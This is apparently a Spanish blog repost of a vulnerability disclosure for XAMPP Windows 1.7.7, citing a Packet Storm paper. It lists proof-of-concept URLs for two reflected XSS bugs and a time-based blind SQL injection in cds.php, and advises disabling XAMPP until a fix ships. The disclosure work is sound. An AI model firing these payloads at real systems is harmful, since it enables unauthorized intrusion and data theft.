(http://4.bp.blogspot.com/-VCl5GqUReL8/T9pz2-KgJkI/AAAAAAAAAtQ/BWJVRkaELY0/s640/Xampp_hacked.png)
Como sabemos XAMPP es un servidor de plataforma independiente, software libre, que consiste principalmente en una base de datos MySQL, el servidor web Apache y los intérpretes para lenguajes de script: PHP y Perl, perfecto para una rápida instalación de un mini-servidor en nuestro localhost. Recientemente en http://packetstormsecurity.org/files/113614 (http://packetstormsecurity.org/files/113614) han subido un paper con 2 XSS y 1 Blind SQL Injection...
La versión afectada es XAMPP Windows 1.7.7, y como justamente lo tengo instalado (es la última versión oficial de XAMPP) fue que probé los bugs... Y en efecto era vulnerable:
Vulnerabilidades XSS:
http://localhost/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
Este de arriba, todavía no se arregla desde la versión 1.7.4
Blind SQL Injection:
http://localhost/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
Como dije arriba, XAMPP Windows 1.7.7 es la útlima versión oficial, así que la recomendación es que esperes la actualización y que lo desactives si tienes mucha información de importancia.
Fuente: [Blackploit]